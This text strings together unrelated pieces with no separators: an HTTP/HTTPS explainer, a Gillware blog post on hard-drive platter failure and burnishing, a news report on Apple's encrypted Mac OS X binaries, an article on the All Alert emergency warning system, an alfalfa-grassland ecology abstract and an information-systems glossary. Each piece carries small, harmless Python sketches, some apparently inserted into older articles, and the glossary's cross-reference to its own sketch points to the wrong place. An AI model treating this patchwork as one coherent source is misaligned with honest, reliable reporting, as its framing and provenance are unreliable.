The World Wide Web uses this underlying protocol to define how messages are formed and transmitted over the Internet. The various responses of web servers and client browsers are expressed through a number of commands. Entering the URL of a site into the address bar amounts to sending an HTTP command to a specific server to fetch the requested pages of that site. One more feature of this protocol is that commands are executed independently of one another, which is why HTTP is known as a stateless protocol: each command is carried out autonomously, without knowledge of the commands that came before it.

An additional "s" at the end of HTTP indicates that the requested site is secure and encrypted. You can think of HTTPS as the combination of HTTP and the SSL/TLS protocol. The purpose of an HTTPS connection is to authenticate the web server and encrypt the communication. The need for HTTPS arises from the insecurity of plain HTTP, which is subject to eavesdropping and man-in-the-middle attacks designed to deceive users and steal their website accounts or other sensitive information. HTTPS is designed to resist such malicious attacks and is considered a good defense against them; you will notice that sites handling money transactions commonly use HTTPS connections.

Strictly speaking, however, HTTPS is not a separate protocol: it is simply HTTP carried over a secure SSL/TLS-encrypted connection. As a result, everything in an HTTPS exchange -- the headers, the request and the response payload -- is encrypted. HTTPS is also different from S-HTTP (Secure HTTP). Finally, the term "HTTP proxy" refers to a bridge that can act as an HTTP server toward the client and as an HTTP client toward the destination server.
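To make the request/response exchange concrete, here is a minimal sketch in Python that speaks HTTP 1.1 directly over a TCP socket and prints the status line and headers the server sends back. The host used is the standard example.com placeholder; a real client would normally use a library such as urllib, or an HTTPS connection, instead.

```python
import socket

HOST = "example.com"  # placeholder host for illustration
REQUEST = (
    "GET / HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Connection: close\r\n"
    "\r\n"
)

with socket.create_connection((HOST, 80), timeout=10) as sock:
    sock.sendall(REQUEST.encode("ascii"))
    response = b""
    while chunk := sock.recv(4096):   # read until the server closes the connection
        response += chunk

head, _, body = response.partition(b"\r\n\r\n")
print(head.decode("iso-8859-1"))      # status line plus response headers
print(f"--- body: {len(body)} bytes ---")
```

The same exchange over HTTPS would simply wrap the socket in TLS (for example with Python's ssl module) before sending the identical HTTP request, which is exactly the "HTTP over SSL/TLS" relationship described above.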
Introduction: Data Recovery 101 Gillware is rolling out a new blog series titled “Data Recovery 101”, in which our bloggers will take a closer look at each of the different components of a hard drive and explain how they work, how they fail and how we recover the data from each failure situation. The series will include five of the main components of a hard drive: platters, read/write heads, spindle motor, firmware and electronic components such as the control board and other circuitry. When a hard drive is functioning properly, these parts work together in an intricate balance. The parts are very delicate, and even the slightest malfunction can have disastrous consequences. We see a variety of different failures on a daily basis, both logical and mechanical, and most failures can be tied back to one of the five components mentioned above. In the blog series, we’ll analyze each failure to give you a better idea of what’s going on inside a failed drive. But we won’t stop there, of course. We’ll also give you an inside look at some of the advanced techniques Gillware uses to recover data from different failure situations. This post will focus on the part of the drive that stores the data itself: the platters. What are the platters? Platters are the thin, circular discs made of glass or aluminum inside the sealed hard drive enclosure. Depending on the capacity and age of the device, a hard drive can contain anywhere from one to 10 or more platters. Each platter surface is coated with an extremely thin magnetic substrate that stores the user’s binary data (1s and 0s) in the form of a magnetic field. When these 1s and 0s are arranged in a particular order, the device can read recognizable data like pictures, documents, spreadsheets and more. How do the platters work? In order to store information, the binary data must be written to the magnetic surface of the platter. To access the data, it must be read. Another crucial hard drive component, the read/write head assembly, is responsible for both of these functions. The read/write heads are tiny sensors that float just 5-10nm above the surface of the platters on a cushion of air generated by the platters spinning at thousands of rotations per minute. When operating normally, the airflow inside the hard drive chassis is smooth and consistent, resulting in the steady flight of the read/write heads over the platter surface. Although hard drives are not technically hermetically sealed devices (except for some of the new, ultra high density HDDs being built), the internal environment does need to remain free of dust and other contaminants to ensure that the heads can float unobstructed over the platters. How do the platters fail? In certain situations, the read/write heads can crash and contact the delicate platter surface. Since the heads are so close to the platters, even a tiny speck of dust, dirt or a fingerprint can have adverse effects on the operation of the drive (which is why it’s so important not to open hard drives outside of a cleanroom environment). The heads can crash for a variety of reasons including spindle motor failure, power surge or sudden loss of power, among others. While this can be an entirely separate issue, the real problem can be damage to the magnetic substrate caused when the heads contact the platters and spread microscopic debris throughout the chassis which can become embedded in the platter surface. 
In serious cases, rotational scoring occurs, leaving score marks in the magnetic substrate when the read/write heads touch the surface as the platters rotate. Though the damage may be microscopic, the debris continually impacts the read/write heads and eventually destroys them, making the drive inoperable and the data inaccessible. Even if the heads are replaced, the damage to the platters must be addressed, or any replacement heads will just get destroyed as well. How can you recover data from damaged platters? Sometimes, if the damage to the platters is too severe, the data stored on them can be unrecoverable. For example, some of the more extreme cases we’ve seen in our data recovery lab involve shattered platters, melted platters, or platters that have had the magnetic substrate completely removed from them from such a high degree of rotational scoring. When the platters are broken, incinerated or stripped of their coating, there is simply nothing to recover the data from. In situations where the magnetic substrate is largely intact, Gillware utilizes sophisticated equipment used by hard drive manufacturers, re-engineered for the purposes of data recovery, to measure and eliminate platter debris and imperfections. The process is known as burnishing. In order to undergo burnishing, the platters are removed from the hard drive chassis in a controlled, cleanroom environment. The platter is mounted on a custom fixture that spins the platter in excess of 10,000 RPM, which is nearly twice as fast as the platters rotate in an average hard drive. A robotic arm passes a specially designed burnishing head over the platter, which works as a precise scrub brush to remove debris and repair damage on the platter surface. Then the platters are remounted, the new heads are installed and the drive is calibrated. Although it will not be in perfect working order, the drive is now operational to a point at which the data can be successfully extracted from the device and recovered. To learn more… In the posts to come, you’ll learn more about the different hard drive components we discussed in this post (read/write heads, spindle motor and more) and how they work together to create a fully functioning hard drive. Additionally, we’ll show you what can go wrong with each of these components and how Gillware recovers data from different situations of hard drive failure. If you’re interested in learning more about how the burnishing process works, check out our burnisher blog post.
The company has encrypted critical parts of its operating system to protect it from software pirates, according to a researcher.

A computer researcher has made public information showing that Apple Computer has encrypted, at the binary level, critical parts of its Mac OS X operating system. These "Apple-protected binaries" can serve to protect the OS from being pirated and also to make it "nontrivial" to run Mac OS X on non-Apple hardware, said Amit Singh, a member of Google's technical staff in Mountain View, Calif., and the author of "Mac OS X Internals: A Systems Approach." Singh has also given lectures on Mac OS X to the National Security Agency and at Apple's main campus in Cupertino, Calif.

According to Singh, the parts of Mac OS X that are protected include the Finder and Dock applications, as well as parts of Rosetta (Mac OS X's application for running PowerPC applications on an Intel-based Mac) and services that manage the user interface. Singh noted that his list was not exhaustive. Much of Mac OS X is open source, including Darwin, an entirely functional, open-source operating system based on FreeBSD 5.0 and the Mach 3.0 microkernel, and the basis for Mac OS X.

The Apple-protected binaries signal their protected status by setting a special bit in the header, Singh said. When any binary is called upon by the system, the kernel checks to see if it is Apple-protected; if it is, the kernel decrypts the code through an "unprotect" operation. This operation, Singh noted, includes a "dsmos_page_transform" command, in which "dsmos" stands for "Don't Steal Mac OS X". He also found a "Dont Steal Mac OS X.kext" kernel extension in the operating system.

"A lot of times, encrypted binaries are used as piracy protection," said Bruce Schneier, founder and chief technology officer of Mountain View, Calif.-based Counterpane Internet Security. "It's a common technique," he said. "But more often, and probably what it's used for here," he added, "is as anti-reverse engineering."

Schneier noted that encrypted binaries can affect application performance because of the extra decoding step required before they can be executed. However, he said, "As computers grow faster, there's more processing power to do stuff like this. The devil's in the details."

Speaking to concerns about privacy, Schneier said, "There's nothing sinister here. This is a method for Apple to protect its code." He added that for people who still want to try to get Mac OS X running on commodity PC hardware, "you can get around it, but not easily."

Apple representatives were not available to comment.
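The mechanism Singh describes -- a flag bit in the binary's header that tells the kernel which code needs the "unprotect" transform before it can run -- boils down to a simple bitwise test. The sketch below is a generic illustration of checking such a flag in a header word; the offset and bit position are invented for the example and are not the actual Mach-O definitions.

```python
import struct

# Hypothetical layout for illustration: a header whose bytes 12-15 hold a
# little-endian 32-bit flags word, with bit 3 marking "protected" code.
FLAGS_OFFSET = 12
PROTECTED_FLAG = 1 << 3

def is_protected(header: bytes) -> bool:
    """Return True if the (hypothetical) protected bit is set in the header's flags word."""
    (flags,) = struct.unpack_from("<I", header, FLAGS_OFFSET)
    return bool(flags & PROTECTED_FLAG)

if __name__ == "__main__":
    plain = bytes(16)                       # all-zero header: not protected
    marked = bytearray(16)
    marked[FLAGS_OFFSET] = PROTECTED_FLAG   # set bit 3 of the flags word
    print(is_protected(plain))              # False
    print(is_protected(bytes(marked)))      # True
```

In the real system it is the kernel, not user code, that performs this check and then runs the page-by-page decryption Singh observed.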
Everyone has heard emergency alert signals transmitted over television and radio, usually followed by, "This is only a test ..." But what if it were a real emergency? People watching TV or listening to the radio would certainly be alerted. But what if the emergency happened in the middle of the night, when few people watch TV or tune in to the radio? The original Emergency Broadcast System (EBS), developed in 1963 under the Kennedy administration, was replaced in 1994 by the Emergency Alert System (EAS), developed by the FCC. The EAS expanded the EBS to more outlets and allowed more detailed information to be distributed, but even the EAS relies extensively on television and radio to distribute warnings. The FCC simply had no way to envision the huge technological changes occurring between then and now. "Since the events of Sept. 11, there's been a realization that the emergency alert system, which was originally designed for a Cold War scenario, needs to be a lot more responsive to 21st century technology," said Reynold Hoover, director of the Office of National Security Coordination in the Federal Emergency Management Agency (FEMA). "We need to be able to alert more people more of the time in the event of a crisis." FEMA, which manages the EAS, is now teaming with other federal agencies as well as state technology leadership and the private sector to create the All Alert system. The new system will build on the Amber Alert infrastructure to more efficiently alert the public via a wide variety of communication devices, when emergencies occur. In 2004, an amendment to the 9/11 Intelligence Reform Bill mandated a one-year pilot to improve distribution of emergency warnings, including upgrading to satellite technology. FEMA, the Association of Public Television Stations and the Department of Homeland Security's Information Analysis and Infrastructure Protection Directorate are working with other federal departments and agencies, private communication companies and broadcasters to improve public alerts during times of crisis. All Alert will utilize the digital capabilities of the nation's public television stations and the voluntary participation of cellular phone service providers; public and commercial radio; television broadcasters; satellite radio, cable and Internet providers; and equipment manufacturers. "We've been exploring today's technologies to expand the system so everyone, no matter where they are or at what time -- day or night -- will be assured of receiving emergency information followed by an appropriate protective action," said Hoover. The amendment also requires the federal government team to work with the National Association of State Chief Information Officers (NASCIO), which will help retool the Amber Alert child abduction system into a technology backbone for the new All Alert system. The goal is to adapt the Amber Alert platform to a common messaging infrastructure that will be owned at the federal and state levels. "When an alert goes out to the public, it will be very easy for anyone to pick up the message via a variety of communication tools," said Chris Dixon, issues coordinator with NASCIO. "We want to keep it totally open, so as communication channels evolve and the methods with which people get information change, our message platform will remain a steady fixture." All Alert will greatly expand the EAS, which is restricted in how much information it can provide and its ability to supply follow-up instructions, such as where people should seek shelter. 
"Today people tend to call 911 to find out more, and they end up tying up that system," said Peter Ward, expert consultant to NASCIO on public warning. "With EAS, if you needed to reach people at night, you would reach less than 3 percent of them. Even during daytime under ideal circumstances, you would likely only reach 30 percent. When time is of the essence, you need to reach the majority of the population." The EAS also has little redundancy built into it. All Alert will be highly redundant, so if one system goes down, there will be several available to back it up. A Customizable Solution All Alert is not just about the technology involved. The federal team already successfully demonstrated the ability to receive, broadcast and rebroadcast simulated emergency messages from FEMA to participants from the broadcast, cable and wireless telecommunications industry, and emergency management officials. Instead, the challenges behind All Alert revolve around bringing parties together to collaborate on building a backbone that will allow the public to determine, which alerts to receive and over which devices. "The long-term plan is [that] citizens will be able to decide which types of warnings they want to receive," said Ward. "The ability to receive warnings will ultimately be built into all kinds of electronics, and when a warning applies to a person, it would be relayed to them. The technology is already there. This is all about building the backbone." That's where the Amber Alert system can help, said Todd Sander, incoming director of the Amber Alert 911 Consortium, explaining that the idea is to build All Alert on the Amber Alert infrastructure. "Amber Alert becomes important because it provides a platform for states and the federal government to work together," Sander said. "My first and most important job is getting the states that aren't part of the Amber Alert Consortium to join so we can get everyone focused on connecting to each other and the federal government. We can build the backbone from there." The original concept behind the Amber Alert system was to bring the best technology to a system that didn't work very well. "First we eliminated the time lag. Amber Alerts can be activated within 10 minutes of an initial report about a missing or abducted child," said Chris Warner, developer of the Amber Alert system and founder of Engaging and Empowering Citizenship. "We then geocoded the system so it knows who needs to get the alert and sends it only to whom the alert is relevant. It also uses prediction modeling to let other agencies know when they should be on the lookout and prepared to respond -- engaging people not only where the event happened, but also where it could potentially expand in the following hours." Warner, Sander and NASCIO are now responding to the federal government's request to incorporate Amber Alert technology into All Alert. But while Amber Alert is one specific alert coming from one specific first responder group -- law enforcement -- All Alert will include multiple types of alerts from multiple first responder groups that are then passed to the public. "The challenge is getting all the practitioners together and making sure we have a system that serves the needs of all the different interest groups," said NASCIO's Dixon. "But if we don't do this now, working together, the federal government and each state would eventually build their own separate systems. Trying to tie them all together at that point would probably take an act of divine intervention." 
NASCIO's role is to help bring all 50 states and the federal team together to make a system that serves a wide variety of first responder groups and handles alerts from the very mundane to the very worst instances. Dixon said private-sector players, including communications companies and broadcasters, have not been difficult to convince, because they see the All Alert system as a valuable service they can offer their customers. "The early indications with Amber [Alert] is that private-sector companies almost clamor for the opportunity to do this," he said. Working together, the federal team, along with the NASCIO team and the private-sector players, hope to have a pilot All Alert system ready to demonstrate by September 2005. Once All Alert is up and running, those involved say it will let first responders do their jobs faster while relieving some of their burden. "This will make first responders' jobs easier because they can get information out to the community fast. The more informed the community is, the more able they are to respond appropriately," said Sander. "A lot of the panic and danger that occur during an emergency stem from the confusion generated when the public doesn't know what's going on. This is the first thing I've seen in 15 years of working in the government technology arena that breaks down the barriers between jurisdictions and can really make a huge difference in people's lives." For the public, the All Alert system means reducing some of that confusion so they can better respond to emergency situations. "We can significantly improve our early warning systems in the United States in a short period of time if we can work together," said Ward. "Amber Alert proved the coordination can be done. Now we just need to cooperate and expand to reach more people using more outlets."
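The geocoding Warner describes -- sending an alert only to the people in the area where it is relevant -- can be pictured with a small sketch. The example below checks whether a recipient's last known coordinates fall within an alert's radius using the haversine distance; the coordinates and radius are made-up values for illustration, not part of the actual Amber Alert or All Alert systems.

```python
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometers."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))

def should_alert(recipient, alert):
    """Deliver the alert only if the recipient is inside the alert's radius."""
    distance = haversine_km(recipient["lat"], recipient["lon"], alert["lat"], alert["lon"])
    return distance <= alert["radius_km"]

if __name__ == "__main__":
    alert = {"lat": 38.90, "lon": -77.03, "radius_km": 40}   # example alert zone
    nearby = {"lat": 38.98, "lon": -76.94}                    # about 12 km away: inside the zone
    far_away = {"lat": 39.29, "lon": -76.61}                  # roughly 55 km away: outside the zone
    print(should_alert(nearby, alert), should_alert(far_away, alert))
```

In a production system the same check would of course run against subscriber records or broadcast zones rather than hard-coded points, and the prediction modeling Warner mentions would expand the zone over time.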
Kelemen A., Torok P., and 8 more authors (Debreceni Egyetem TEK / Debrecen University). Journal of Landscape Ecology | Year: 2010

Spontaneous succession is often underappreciated in restoration, for lack of restoration-focused case studies. We studied the regeneration of alkali and loess grasslands in extensively managed (mown twice a year) alfalfa fields using space-for-time substitutions. In our study we addressed the following questions: (i) How fast does the perennial alfalfa disappear from the vegetation following the abandonment of intensive management? (ii) Is the course of vegetation development in extensively managed alfalfa fields different from that in abandoned crop fields formerly cultivated with short-lived crops? (iii) How fast is the regeneration of native grasslands in extensively managed alfalfa fields? We found that alfalfa gradually disappeared from the vegetation, and its cover was low in 10-year-old alfalfa fields. We also detected a continuous replacement of alfalfa by perennial native grasses and forbs. No weed-dominated stages were detected during the spontaneous grassland recovery in alfalfa fields. Our results suggest that the recovery of species-poor grasslands is possible within 10 years. The partial recovery of loess and alkali grasslands does not require technical restoration methods in alfalfa fields where nearby native grasslands are present.
By patvdv at 19 Feb 2008 - 23:52

- ACID Transactions - ACID transactions satisfy the properties of Atomicity, Consistency, Isolation, and Durability. As complex update operations on possibly distributed data, transactions are subject to various failure conditions. For instance, some step of a transaction may violate an integrity constraint, the connection to a remote database may get lost, or the server running the transaction application may crash during the execution of a transaction.

Atomicity denotes the requirement that a transaction be all-or-nothing: either it executes completely or not at all. If all steps of a transaction have been performed successfully, the transaction commits, making all involved updates permanent. If some step fails, the transaction aborts, rolling back all involved updates. (A minimal commit/rollback sketch appears at the end of this glossary.)

A transaction program should maintain the consistency of the databases it updates. Since the internal consistency of a database is defined by its integrity constraints, this means that all integrity constraints have to be satisfied when the transaction is completed.

For performance reasons, transactions are executed concurrently by interleaving the execution of their single steps. Special techniques (such as locking mechanisms) are needed to avoid interference between transactions accessing the same database objects. Referring to concurrent transactions, one says that the isolation property is satisfied if their effects are the same as if they were run one at a time in some order -- in other words, if they are serializable.

Finally, a transaction is durable if all of its updates are stored on a permanent storage medium when it commits. This is usually achieved by writing a copy of all the updates of a transaction to a log file. If the system fails after the transaction commits and before the updates go to the database, then after the system recovers it rereads the log and checks that each update actually made it to the database; if not, it re-applies the update to the database. Notice that unlike atomicity, isolation and durability, which are guaranteed by the transaction processing system, maintaining consistency is the responsibility of the application programmer.

- Agent - A computer program that can accept tasks from its human user, can figure out which actions to perform in order to solve these tasks, and can actually perform these actions without user supervision is an example of a software agent. More generally, any system that is capable of perceiving events in its environment, of representing information about the current state of affairs, and of acting in its environment guided by perceptions and stored information is called an agent. If the environment is virtual, such as the Internet, we deal with software agents. If the environment is physical, we deal either with natural agents such as human beings and animals, or with artificial physical agents such as robots and embedded systems. The term agent denotes an abstraction that subsumes all these different cases.

Typical examples of software agents are web shopping assistants and life-like characters (artificial creatures) in computer games. Typical examples of artificial physical agents are the entertainment robot Aibo by Sony and the unmanned NASA space vehicle Deep Space One.

The philosophical basis for the agent paradigm in computer science is the concept of intentional systems, introduced by Daniel Dennett in (Den71) to characterize systems whose behavior can best be explained and forecast by ascribing them beliefs, goals and intentions. Following Dennett, Yoav Shoham proposed in (Sho93) a mentalistic approach to modeling and programming agents, called Agent-Oriented Programming. In this approach, the data structures of an agent program reflect basic mental components such as beliefs, commitments and goals, while the agent's behavior is determined by reaction rules that refer to its mental state and are triggered by events, and possibly by its planning capabilities for pro-actively achieving its goals.
It is expected that software agents capable of assisting their users in coping with the increasing complexities caused by the accelerating and virtually uncontrolled growth of the World Wide Web will play a major role in the future. The term agent is sometimes used as a synonym for intelligent system, but in general agents do not have to be 'intelligent'. In software engineering, for instance, the ability of an agent to communicate and cooperate with other systems in a flexible manner, and the ability of a mobile agent to migrate to another computer providing more resources via suitable network links, are considered more fundamental than any form of 'intelligence'.

An important feature of agents is their ability to communicate and interact with each other. For artificial agents, communication is normally implemented by an asynchronous message passing mechanism. Agents created by different designers must speak the same agent communication language for expressing the type of communication act, and must refer to shared ontologies in order to understand the contents of each other's messages. Conversations between agents often follow a certain protocol that defines the admissible patterns of message sequences.

Similar to the notion of objects in software engineering, the term agent denotes an abstraction that leads to more natural and more modular software concepts. While the state of an object is just a collection of attribute values without any generic structure, the state of an agent has a mentalistic structure comprising perceptions and beliefs. Messages in object-oriented programming are coded in an application-specific, ad-hoc manner, whereas messages in agent-oriented programming are based on an application-independent agent communication language. An agent may exhibit pro-active behavior with some degree of autonomy, while the behavior of an object is purely reactive and under full control of those other objects that invoke its methods.

- Agent-Oriented Information Systems (AOIS) - represent a new information system paradigm where communication between different (software-controlled) systems and between systems and humans is understood as communication between agents whose state consists of mental components (such as beliefs, perceptions, memory, commitments, etc.). In enterprise information systems, for instance, the AOIS paradigm implies that business agents are treated as first-class citizens along with business objects.

- Business Rules - are statements that express a business policy, defining or constraining some aspect of a business, in a declarative manner (not describing/prescribing every detail of their implementation). Business rules may be strict or defeasible (allowing exceptions).
They can be formalized as integrity constraints, derivation rules, or reaction rules.

- Business Transaction - A sequence of actions performed by two or more agents, involving a flow of information and a flow of money, and normally also a flow of material or certain other physical effects. Usually, it requires some bookkeeping to record what happened. Today, this bookkeeping is done by the computer-based information systems of the involved business partners. Since an enterprise may participate in a great number of business transactions at the same time, this requires sophisticated information system technologies for guaranteeing high performance and consistency.

- Common Object Request Broker Architecture (CORBA) - an established standard allowing object-oriented distributed systems to communicate through the remote invocation of object methods.

- Database Management System (DBMS) - The main purpose of a DBMS is to store and retrieve information given in an explicit linguistic format (using various symbols). As opposed to certain other types of information that are also processed in agents, this type of information is essentially propositional, that is, it can be expressed as a set of propositions in a formal language. In the sixties and seventies, pushed by the need to store and process large data sets, powerful database management systems extending the file system technology were developed. These systems were named hierarchical and network databases, referring to the respective type of file organization. Although they were able to process large amounts of data efficiently, their limitations in terms of flexibility and ease of use were severe. Those difficulties were caused by the unnatural character of the conceptual user interface of hierarchical and network databases, which consisted of the rather low-level data access operations dictated by their way of implementing storage and retrieval. Thus, both database models later turned out to be cognitively inadequate. The formal conceptualization of relational databases by Codd in the early seventies made it possible to overcome the inadequacy of the first-generation database technology. The logic-based formal concepts of the relational database model have led to more cognitive adequacy, and have thus constituted the conceptual basis for further progress (towards object-relational, temporal, deductive, etc. databases). Driven by the success of the object-oriented paradigm, and by the desire to improve the relational database model, object-relational databases are now increasingly regarded as the successor to relational databases. This development is reflected in the progression of SQL, the established standard language for database manipulation, from SQL-89 via SQL-92 to SQL-99.

- Data Warehouse - A very large database that stores historical and up-to-date information from a variety of sources and is optimized for fast query answering. It is involved in three continuous processes: 1) at regular intervals, it extracts data from its information sources, loads it into auxiliary tables, and subsequently cleans and transforms the loaded data in order to make it suitable for the data warehouse schema; 2) it processes queries from users and from data analysis applications; and 3) it archives the data that is no longer needed by means of tertiary storage technology. Most enterprises today employ computer-based information systems for financial accounting, purchase, sales and inventory management, production planning and control.
In order to efficiently use the vast amount of information that these operational systems have been collecting over the years for planning and decision making purposes, the various kinds of information from all relevant sources have to be merged and consolidated in a data warehouse. While an operational database is mainly accessed by OLTP applications that update its content, a data warehouse is mainly accessed by ad hoc user queries and by special data analysis programs, also called Online Analytical Processing (OLAP) applications. For instance, in a banking environment, there may be an OLTP application for controlling the bank's automated teller machines (ATMs). This application performs frequent updates to tables storing current account information in a detailed format. On the other hand, there may be an OLAP application for analyzing the behavior of bank customers. A typical query that could be answered by such a system would be to calculate the average amount that customers of a certain age withdraw from their accounts by using ATMs in a certain region. In order to attain quick response times for such complex queries, the bank would maintain a data warehouse into which all the relevant information (including historical account data) from other databases is loaded and suitably aggregated. Typically, queries in data warehouses refer to business events, such as sales transactions or online shop visits, that are recorded in event history tables (also called 'fact tables') with designated columns for storing the time point and the location at which the event occurred. Usually, an event record has certain numerical parameters such as an amount, a quantity, or a duration, and certain additional parameters such as references to the agents and objects involved in the event. While the numerical parameters are the basis for forming statistical queries, the time, the location and certain reference parameters are used as the dimensions of the requested statistics. There are special data management techniques, also called multidimensional databases, for representing and processing this type of multidimensional data. For further reading, see (Cod94, AM97, IWK97).

- Derivation Rules (or deduction rules) - are used for defining intensional predicates and for representing heuristic knowledge, e.g. in deductive databases and in logic programs. Intensional predicates express properties of, and relationships between, entities on the basis of other (intensional and extensional) predicates. Heuristic knowledge is often represented in the form of default rules, which may be naturally expressed using the weak and strong negation of partial logic (as in the formalism of 'extended logic programs'). While relational databases make it possible to define non-recursive intensional predicates with the help of views, they do not support default rules or any other form of heuristic knowledge.

- Electronic Data Interchange (EDI) - denotes the traditional computer-to-computer exchange of standard messages representing normal business transactions, including payments, information exchange and purchase order requests. Besides the two main international standards for EDI messages, UN/EDIFACT and ANSI X.12, there are several vertical EDI standards. EDIFACT is administered by a working party (WP.4) of the United Nations Economic Commission for Europe (UN/ECE). The EDIFACT syntax rules have been published by the ISO as ISO 9735. In (Moo99), it is shown that current EDI standards have the message structure proposed by speech act theory.
The current EDI standards are being criticized because of a number of problems such as underspecified meaning, idiosyncratic use and inflexibility. In 1999, a major initiative was launched to replace the outdated EDI message syntax with a more flexible XML-based framework called ebXML.

- Enterprise Application Integration (EAI) - refers to the problem of how to integrate the increasing number of different application systems and islands of information an enterprise has built up over many years. The EAI problem also arises through the formation of a virtual enterprise or from merging two companies. While the integration of various islands of information, including databases, sequential files, and spreadsheets, may be achieved through data federation systems, the interoperation between different application systems requires an asynchronous message exchange technology, also called message-oriented middleware (MOM). In addition, a message translation service is needed to transform the messages sent by one application into the message language of another application (a small translation sketch follows the ERP entry below). An application-independent EAI message language, called Business Object Documents, is proposed by the Open Applications Group. The integration of applications across enterprise boundaries is also called 'Enterprise Relationship Management'.

- Enterprise Resource Planning (ERP) - systems are generic and comprehensive business software systems based on a distributed computing platform including one or more database management systems. They combine a global enterprise information system covering large parts of the information needs of an enterprise with a large number of application programs implementing all kinds of business processes that are vital for the operation of an enterprise. These systems help organizations to deal with basic business functions such as purchase/sales/inventory management, financial accounting and controlling, and human resources management, as well as with advanced business functions such as project management, production planning, supply chain management, and sales force automation. First-generation ERP systems now run the complete back office functions of the world's largest corporations. The ERP market rose at 50% per year to $8.6 billion in 1998, with 22,000 installations of the market leader, SAP R/3. Typically, ERP systems run in a three-tier client/server architecture. They provide multi-instance database management as well as configuration and version (or 'customization') management for the underlying database schema, the user interface, and the numerous application programs associated with them. Since ERP systems are designed for multinational companies, they have to support multiple languages and currencies as well as country-specific business practices. The sheer size and the tremendous complexity of these systems make them difficult to deploy and maintain.
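The EAI entry above notes that a message translation service must transform the messages sent by one application into the message language of another. The following Python sketch shows the shape of such a translation step; the two record formats and all field names are invented for illustration, and a real EAI deployment would add routing, queuing and error handling around it, typically via message-oriented middleware.

# Minimal sketch of an EAI-style message translation step.
# Both message formats are hypothetical; only the mapping idea matters.
def translate_order(erp_message: dict) -> dict:
    """Map a (hypothetical) ERP order message to a (hypothetical)
    warehouse-system message."""
    return {
        "orderId": erp_message["order_no"],
        "customer": erp_message["cust_id"],
        "lines": [
            {"sku": line["article"], "qty": line["quantity"]}
            for line in erp_message["items"]
        ],
    }

if __name__ == "__main__":
    erp_msg = {
        "order_no": "A-1001",
        "cust_id": "C-42",
        "items": [{"article": "BOLT-M8", "quantity": 500}],
    }
    print(translate_order(erp_msg))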
- Entity-Relationship (ER) Modeling - A conceptual modeling method and diagram language based on a small number of ontological principles: an information system has to represent information about entities that occur in the universe of discourse associated with its application domain, and that can be uniquely identified and distinguished from other entities; entities have properties and participate in relationships with other entities; in order to represent entities in an information system, they are classified by means of entity types; each entity type defines a list of (stored and virtual) attributes that are used to represent the relevant properties of the entities associated with it; together, the values of all attributes of an entity form its state; in order to represent ordinary domain relationships (or associations) between entities, they are classified by means of relationship types; there are two designated relationships between entity types that are independent of the application domain: specialization (subclass) and composition (component class). ER modeling was introduced in [Che76]. In its original form, it included the primary key concept as its standard naming technique, but did not include specialization and composition. The primary key standard naming technique proved to be inadequate, since a standard name should be a unique identifier which is associated with an entity throughout its entire life cycle, implying that it must be immutable. However, the basic idea of ER modeling does not depend on the primary key concept. It is also compatible with the object identifier concept of OO systems and ORDBs. This implies that ER modeling does not preclude the possibility of two distinct entities having the same state. It is therefore justified to view OO information modeling, such as UML class diagrams, as an inessential extension of ER modeling, and to regard ER modeling as the proper foundation of information modeling.

- Information System (IS) - An IS is an artifact (or technical arrangement) for efficiently managing, manipulating, and evaluating information-bearing items such as paper documents, ASCII text files, or physical objects. Today, especially in enterprises and other large organizations, more and more ISs are computerized and implemented by means of DBMS technology. One may distinguish between private, organizational and public ISs. Typical examples of a private IS are personal address databases and diaries. The major paradigms of an organizational IS are transaction-oriented database (OLTP) applications (such as ERP systems) and query-answering-oriented data warehouse (OLAP) applications. Typical examples of a public IS are libraries, museums, zoos, and web-based community ISs.

- Integrity Constraints - are sentences which have to be satisfied in all evolving states of a database (or knowledge base). They stipulate meaningful domain-specific restrictions on the class of admissible databases (or knowledge bases). Updates are only accepted if they respect all integrity constraints. The most fundamental integrity constraints are value restrictions, keys and foreign keys (or referential integrity constraints). A small SQL sketch follows the interoperability entry below.

- Interoperability - denotes the ability of two or more systems to collaborate. At a lower level, this concerns the ability to exchange data and to allow for remote procedure calls from one system to another. At a higher level, it requires the ability to participate in the asynchronous exchange of messages based on an application-independent language (such as KQML or FIPA-ACL).
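To make the integrity constraints entry (and the atomicity and consistency requirements from the ACID entry at the top of this glossary) concrete, here is a small, self-contained Python/SQLite sketch. The table and column names are invented for illustration; the point is only to show a primary key, a foreign key and a value restriction (CHECK), and a transaction that is rolled back as a whole when a constraint would be violated.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # enforce referential integrity

# A key, a foreign key and a value restriction as integrity constraints.
conn.executescript("""
CREATE TABLE customer (
    cust_id INTEGER PRIMARY KEY,
    name    TEXT NOT NULL
);
CREATE TABLE account (
    acct_id INTEGER PRIMARY KEY,
    cust_id INTEGER NOT NULL REFERENCES customer(cust_id),
    balance NUMERIC NOT NULL CHECK (balance >= 0)
);
""")
conn.execute("INSERT INTO customer VALUES (1, 'Alice')")
conn.execute("INSERT INTO account VALUES (10, 1, 100)")
conn.commit()

# Atomicity and consistency: an update that would violate the CHECK
# constraint raises an error, and the whole transaction is rolled back.
try:
    with conn:  # the connection acts as a transaction context manager
        conn.execute("UPDATE account SET balance = balance - 250 WHERE acct_id = 10")
except sqlite3.IntegrityError as exc:
    print("transaction rolled back:", exc)

print(conn.execute("SELECT balance FROM account WHERE acct_id = 10").fetchone())
# -> (100,): the failed update left no trace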
- Message-Oriented Middleware (MOM) - denotes a class of software systems for managing transactional message queues as the basis of asynchronous message passing. Well-known products include IBM MQSeries and Sun JMQ. A standard MOM application programming interface for Java, called the Java Message Service (JMS), has been proposed by Sun.

- Message Transport - An abstract service provided by a MOM system in the case of EAI, or by the agent management platform to which the agent is (currently) attached in the case of a FIPA-compliant interoperability solution. The message transport service provides for the reliable and timely delivery of messages to their destination agents, and also provides a mapping from logical names to physical transport addresses.

- OLAP Application - Online Analytical Processing (OLAP) applications make it possible to evaluate large data sets by means of sophisticated techniques, such as statistical methods and data mining techniques. They typically run on top of a data warehouse system.

